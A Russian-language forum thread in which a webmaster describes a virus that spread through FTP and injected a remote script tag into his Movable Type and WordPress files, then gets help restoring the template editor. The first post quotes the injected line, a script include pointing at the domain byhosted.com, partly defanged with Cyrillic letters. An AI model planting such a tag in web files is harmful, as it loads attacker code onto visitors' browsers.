Тема: Не могу редактировать шаблоны

Здравствуйте! Прошу вашей помощи.
9 августа, меня осчастливили вирусом. Google подсказал мне, что я не один такой. С такой же проблемой столкнулись Два миллионера. Вот описание проблемы на их блоге.

Сначала, вирус попадает на ваш, пардон, на мой комп. NOD32, даже не пискнул! Потом, при входе на ftp, он распространяется по всем сайтам. У меня пострадали все сайты на Movable Type и на Wordpress. Автоматически добавляется в каждый файл с названиями: index.php, index.html, config.php, registration.php, template.htm, wp-config.php, wp-admin.php такая строка:

<скрипт src=”aштитипи://byhosted.ком/ajaxengine.жс”></скрипт>

У меня, было заражено около 200 файлов. После чистки, все заработало, но на Movable Type, начались проблемы. Я не могу ни создать, ни отредактировать ни один шаблон. Поле для редактирования затемнено серым цветом. Могу только создавать, редактировать статьи и управлять комментариями.

Может я удалил что-то лишнее или не удалил еще что то? Есть бэкап всех файлов, созданный за две недели до этого случая. Количество пользователей не изменилось, администратор тот же. Буду благодарен любому совету.

P.S. А нашла вирус утилита Dr.Web CureIt!

Отредактировано Денис (18:10:2011 01:24:15)



2

Re: Не могу редактировать шаблоны

Что-то с JS-файлами Movable Type, можно попробовать перезаписать файлы в mt-static.

А все сгенерированные MT файлы можно смело удалять, чтобы не вычищать вручную эти строки. А затем просто полностью опубликовать весь сайт.



3

Re: Не могу редактировать шаблоны

saahov пишет:

Что-то с JS-файлами Movable Type, можно попробовать перезаписать файлы в mt-static.

- Перезаписать из бэкапа?
- На опубликованные после 9 августа записи, это не повлияет?
- Вечером попробую конечно, но судя по датам последнего редактирования файлов, никаких изменений в файлах mt-static не происходило, кроме тех, в которых поселился этот скрипт. Хотя, я редактировал только те файлы, в которых с помощью поиска, было обнаружено слово "byhosted".
- А как через ftp, отредактировать модульный шаблон "Боковое меню". На одном из сайтов (не на том, на который установлен Movable Type), я немного перемудрил с виджетами).
- И еще. Однажды, такой же серый фон, появился после изменений в css. Я еще тогда удивился, как оно может быть связано. Но, так как в этот момент я редактировал и css и шаблоны, то я это заметил и сразу же исправил.

saahov пишет:

А все сгенерированные MT файлы можно смело удалять, чтобы не вычищать вручную эти строки. А затем просто полностью опубликовать весь сайт.

Андрей, ты имеешь в виду, что я мог не редактировать каждый файл index.php, index.html,  а просто удалить их. И после публикации всего сайта, они были бы созданы автоматически и уже без этого скрипта?



4

Re: Не могу редактировать шаблоны

Можно скачать заново дистрибутив и взять файлы оттуда, только не трогая папку /mt-static/support.
На опубликованное это не повлияет.
Ещё может быть, что какой антивирус блокирует загрузку некоторых файлов JS. Такое мне уже попадалось, лечится добавлением админки MT в белый список.

Через FTP (или любой другой протокол, по которому можно редактировать файлы на сервере) можно редактировать шаблоны, если они «связаны с файлами» (такой пункт есть в каждом шаблоне).

Да, верно, Movable Type проверил бы, есть ли файл на сервере, а потом создал бы их, если бы их не было.
Также может быть интересна информация про права доступа: http://movable-type.ru/2007/01/umask.php



5

Re: Не могу редактировать шаблоны

saahov пишет:

Можно скачать заново дистрибутив и взять файлы оттуда, только не трогая папку /mt-static/support.
На опубликованное это не повлияет.

Наконец то! Получилось! Андрей, огромное тебе спасибо!



6

Re: Не могу редактировать шаблоны

Надо делать бекап БД каждый день и отправлять его на почту, наверное надо написать скрипт и засунуть его в крон. Еще можно выделить дисковый раздел, и поставить туда Линукс. И проблема с вирусами исчезнет. От этого только жирный плюс, можете тестировать, все движки, все что работает в нете локально.